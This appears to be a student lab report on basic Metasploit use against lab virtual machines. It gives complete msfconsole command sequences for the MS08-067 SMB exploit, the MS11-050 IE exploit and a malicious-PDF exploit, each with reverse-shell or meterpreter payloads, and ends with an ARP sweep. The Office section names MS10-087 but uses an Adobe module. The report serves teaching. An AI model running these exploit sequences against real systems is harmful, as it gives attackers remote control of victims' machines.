1. 程式人生 > >《網絡對抗》Exp5 MSF基礎應用

《網絡對抗》Exp5 MSF基礎應用

offic 漏洞 以及 無奈 2.3 auxiliary 去除 win 命令

20155336《網絡對抗》Exp5 MSF基礎應用

一、基礎知識回答

  • 用自己的話解釋什麽是exploit,payload,encode
    • exploit:漏洞利用,與靶機進行交互,攻擊靶機的最後一步
    • payload:有效載荷,後面一般加要對靶機進行攻擊的代碼,可以實現任何運行在受害者環境中的程序所能做的事情
    • encode:編碼器,對代碼進行異或運算、去除壞字符等等,保護payload不被發現

二、實踐過程

  • 1.Windows服務滲透攻擊——MS08-067安全漏洞
    • ①攻擊機:kali ②靶機:windows XP SP3(English)

在kali中輸入msfconsole,然後依次輸入一下命令:

  • msf > use exploit/windows/smb/ms08_067_netapi
  • msf exploit(ms08_067_netapi) > show payloads
  • msf exploit(ms08_067_netapi) > set payload generic/shell_reverse_tcp //tcp反向回連
  • msf exploit(ms08_067_netapi) > set LHOST 172.30.4.231//攻擊機ip
  • msf exploit(ms08_067_netapi) > set LPORT 5336 //攻擊端口
  • msf exploit(ms08_067_netapi) > set RHOST 192.168.198.136
    //靶機ip,特定漏洞端口已經固定
  • msf exploit(ms08_067_netapi) >set target 0//自動選擇目標系統類型,匹配度較高
  • msf exploit(ms08_067_netapi) > exploit //攻擊

技術分享圖片

攻擊成功結果如下:

技術分享圖片

  • 2.瀏覽器滲透攻擊——MS11-050
    • ①攻擊機:kali ②靶機:WindowsXP Professional sp2/Windows7專業版 ③IE版本:7.0/8.0
  • 在kali中輸入msfconsole進入控制臺,依次輸入以下指令:
    • msf > use windows/browser/ms11_050_mshtml_cobjectelement
    • msf exploit(ms11_050_cobjectelement) > set payload windows/meterpreter/reverse_http //http反向回連
    • msf exploit(ms11_050_cobjectelement) > set LHOST 172.30.4.231 //攻擊機ip
    • msf exploit(ms11_050_cobjectelement) > set LPORT 5336 //攻擊端口固定
    • msf exploit(ms11_050_cobjectelement) > set URIPATH 20155336hgy //統一資源標識符路徑設置
    • msf exploit(ms11_050_cobjectelement) > exploit

技術分享圖片

在瀏覽器輸入http://172.30.4.231:8080/20155336hgy
,IE出現彈窗,警告遇到問題需關閉程序:

技術分享圖片

攻擊機想要建立會話,但是靶機已經禁止了這個網頁的訪問,失敗了。IE的瀏覽器彈窗阻止了~~但是我已經關掉了防火墻,可還是錯誤。查看了kali的鏈接情況,總是沒有得到響應

技術分享圖片

總之一輸入網址,IE就會直接卡死然後報錯。參考了狄維佳同學的補救措施,還是無能為力。。萬般無奈之下,只能先告一段落惹~~

  • 3.針對Office軟件的滲透攻擊——MS10-087 如出一轍的操作!!
    • ①攻擊機:kali ②靶機:windowsXP Professional sp2 ③Office版本:2003
    • kali輸入msfconsole進入控制臺
    • msf > use windows/fileformat/adobe_cooltype_sing
    • msf exploit(adobe_cooltype_sing) > set payload windows/meterpreter/reverse_tcp //tcp反向回連
    • msf exploit(adobe_cooltype_sing) > set LHOST 172.30.5.99 //攻擊機ip
    • msf exploit(adobe_cooltype_sing) > set LPORT 5336 //攻擊端口
    • msf exploit(adobe_cooltype_sing) > set FILENAME 20155336.pdf//設置生成pdf文件的名字
    • msf exploit(adobe_cooltype_sing) > exploit //攻擊

技術分享圖片

生成的pdf如下圖所示:

技術分享圖片

將生成的pdf文件拷貝到靶機上。

在kali上輸入back退出當前模塊,進入監聽模塊,輸入以下命令:

  • msf > use exploit/multi/handler //進入監聽模塊
  • msf exploit(handler) > set payload windows/meterpreter/reverse_tcp //tcp反向連接
  • msf exploit(handler) > set LHOST 192.168.5.99 //攻擊機ip
  • msf exploit(handler) > set LPORT 5336
  • exploit

技術分享圖片

在靶機上打開201553336.pdf文件:(有一點點的卡頓~~~)
技術分享圖片

攻擊成功:

技術分享圖片

  • 4.輔助模塊的應用:arp_sweep
    • ①攻擊機:kali ②靶機:windowsXP Professional sp2
    • show auxiliary //查看所有的輔助模塊以及用途
    • use auxiliary/scanner/discovery/arp_sweep 進入arp_sweep 模塊
    • show options ---查詢模塊參數
    • set RHOSTS 172.30.5.99hosts主機段設置
    • set THREADS 50加快掃描速度
    • run執行

    技術分享圖片

    技術分享圖片

    • 通過圖可以看出,使用ARP請求枚舉本地局域網絡中的所有活躍主機進行掃描。進入模塊後查詢一下參數。因為只開啟了一個XP虛擬機,所以只掃描到了一個活躍機

《網絡對抗》Exp5 MSF基礎應用